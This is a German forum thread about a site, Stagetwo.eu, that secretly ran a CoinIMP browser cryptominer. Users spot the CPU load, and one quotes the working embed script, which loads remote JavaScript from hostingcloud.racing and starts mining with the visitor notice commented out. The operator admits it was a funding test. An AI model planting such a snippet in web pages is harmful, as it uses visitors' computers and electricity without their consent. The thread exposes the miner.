Crypto Miner oder ähnliches aktiv?

  • Servus,


    Habe gerade gesehen dass mir Stagetwo.eu die komplette CPU auslastet.

    Von Hostingcloud werden diverse Webassemblies geladen (siehe Network Tab in Chrome etc.).


    Was ist das genau?


    Ansonsten wars das dann :)


    Gruss


    Edit:

    Ich bin mir nun ziemlich sicher das ein CryptoMiner (CoinIMP) im Hintergrund läuft:

    -> https://www.coinimp.com/documentation


    Ich will nichts unterstellen, aber sieht für mich so aus als ob der absichtlich hinzugefügt wurde.

    Ist dieser schon länger aktiv?

    Sollte der bleiben, bin ich leider aus StageTwo raus - sorry!

  • Ist mir noch nicht aufgefallen. Sonst hätte mein AV auch angeschlagen.

    Hatte vor einiger Zeit immer nur ein nerviges Mining Popup.


    Sollte sich FragSalat mal angucken

    Rechtschreibfehler sind Spezialeffekte meiner Tastatur und dienen ausschließlich der allgemeinen Belustigung!!!

  • Laden fehlgeschlagen für das <script> mit der Quelle "https://www.hostingcloud.racing/PNDH.js".


    <script src="https://www.hostingcloud.racing/PNDH.js"></script>

    <script>

    var _client = new Client.Anonymous('d19df51b3eb6cadfd4f420389c1f19c41d668165165931f056dfa0161e49fa78', {

    throttle: 0.6,

    ads: 0

    });

    _client.start();

    // _client.addMiningNotification("Floating Bottom", "This site is running JavaScript miner to pay the bills", "#ffffff", 40, "#bd3623");

    </script>

    <a id="bottom"></a>


    throttle, bestimmt wsh. belastung und ads war vorher auf 1.

    glaube dann kommt das popup wieder.

    Kenne mich aber damit nicht aus.


    hab javascripte automatisch deaktivert, deswegen ist mir das nie aufgefallen ^^

  • Ich hatte den mit low throttle mal rein gemacht um zu gucken ob das nen alternatives Finanzierungsmodell im Vergleich zur Werbung waere.

    Hab grad ma reingeguckt und leider bringt das aber nichts genau wie die Werbung.

    Die Werbung bringt wenigstens noch 3 - 5€ im Monat wobei der Miner nicht mal 10 cent gebracht hat.


    Der sollte eigentlich auch nicht viel von der CPU nutzen, dafuer die throttle Einstellung.

  • Wie lange soll das denn aber schon aktiv gewesen sein?

    Habe eigentlich immer HWInfo laufen und

    die Temps und Auslastung waren bis vor kurzem immer normal :D


    Als ich es gerade getestet habe 75% Auslastung und 50°C Package Temperatur :D

    Rechtschreibfehler sind Spezialeffekte meiner Tastatur und dienen ausschließlich der allgemeinen Belustigung!!!

  • Ein Miner schürft nach Kryptowährung, z.B. Bitcoins. Dafür werden bestimmte Berechnungen auf dem PC ausgeführt. Inzwischen gibt es dafür aber hochspezialisierte Hardware und Software, das Ganze frisst auch Unmengen von Strom. Deswegen hätte ich dir gleich sagen können, dass mit ein bisschen minen nebenher kein Blumentopf zu holen ist.

    Dieser Beitrag wurde noch nie editiert, zuletzt von »hangman« (Heute , 13:37)



    1355?mode=raw


    Skill ist, wenn Luck zur Gewohnheit wird

  • Tja, Werbung ist halt so 2000

    Dieser Beitrag wurde noch nie editiert, zuletzt von »hangman« (Heute , 13:37)



    1355?mode=raw


    Skill ist, wenn Luck zur Gewohnheit wird

  • In der Innenstadt betteln gehn. Soll recht lukrativ sein.

    Dieser Beitrag wurde noch nie editiert, zuletzt von »hangman« (Heute , 13:37)



    1355?mode=raw


    Skill ist, wenn Luck zur Gewohnheit wird